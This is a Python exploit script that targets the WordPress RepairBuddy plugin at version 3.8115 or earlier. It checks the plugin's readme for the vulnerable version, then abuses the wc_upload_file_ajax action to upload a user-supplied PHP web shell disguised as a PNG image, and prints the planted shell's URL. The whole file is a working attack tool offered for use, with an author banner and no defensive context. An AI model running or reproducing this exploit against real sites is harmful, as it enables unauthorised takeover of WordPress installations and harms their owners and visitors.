import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning import argparse import re requests.packages.urllib3.disable_warnings(InsecureRequestWarning) user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" def print_banner(): banner = """ @@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@ @@@@@@@ @@@ @@@@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@ @@@@@@@ @@@@ @@@@@@@@ @@@@@@@@ @@@@@@@ !@@ @@! @@@ @@! @@@ @@! @@@@ @@@ @@!@! !@@ @@@!! @@! @@! @@@ @@@ !@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@!!@! !@! !@! !@! !@! @!@ @!@ !@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ @!! @!! @!@!@!@!@ !!@@!! @!@ @!! !!@!!@!! @!@!!@ !!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: !!! !@! !!!@!@!!! @!!@!!! !@! !!! !!@!!! !!@!@! :!! :!: !!: !!: !:! !!:! !!! !:! :!!:!:!!: !:! !!: !!: !!! !!: :!: ::!!:! :!: :!: :!: !:! :!: !:::!!::: !:! :!: :!: !:! :!: ::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: ::: :::: :: ::: :: ::::: :: :: :::: :: :: : : : :: :: :: : ::: : : : : :: : ::: ::: :: : : :: : : : : : : : : Exploit By : Nxploit Khaled Alenazi, """ print(banner) def check_vulnerability(url): readme_url = f"{url}wp-content/plugins/computer-repair-shop/readme.txt" try: response = requests.get(readme_url, headers={'User-Agent': user_agent}, verify=False) if response.status_code == 200 and 'Stable tag: 3.8115' in response.text: print("🎯 The site is vulnerable. Proceeding with the exploit...") return True else: print("❌ The site is not vulnerable.") return False except Exception as e: print(f"Error checking vulnerability: {e}") return False def prepare_headers(url): return { 'User-Agent': user_agent, 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Referer': f"{url}wp-admin/post-new.php?post_type=rep_estimates", 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------26318640401773937217773873037', 'Origin': url, 'Connection': 'keep-alive' } def prepare_data(shell_code): return f""" -----------------------------26318640401773937217773873037 Content-Disposition: form-data; name="file"; filename="nxploit.php" Content-Type: image/png {shell_code} -----------------------------26318640401773937217773873037 Content-Disposition: form-data; name="action" wc_upload_file_ajax -----------------------------26318640401773937217773873037-- """ def extract_shell_url(response_text): match = re.search(r'http[^\s]+nxploit\.php', response_text) if match: return match.group(0).replace("\\", "") return None def upload_shell(url, shell_code): upload_url = f"{url}wp-admin/admin-ajax.php" headers = prepare_headers(url) data = prepare_data(shell_code) try: response = requests.post(upload_url, headers=headers, data=data, verify=False) print(f"Response: {response.text}") if response.status_code == 200: print("✅ Shell uploaded successfully.") shell_url = extract_shell_url(response.text) if shell_url: print(f"🔗 Shell URL: {shell_url}") else: print("❌ Failed to extract shell URL.") else: print("❌ Failed to upload the shell.") except Exception as e: print(f"Error uploading shell: {e}") def main(): parser = argparse.ArgumentParser(description='WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.') parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-shell', default='', help='Shell code to upload') args = parser.parse_args() url = args.url shell_code = args.shell if not url.endswith('/'): url += '/' print_banner() if check_vulnerability(url): upload_shell(url, shell_code) if __name__ == "__main__": main()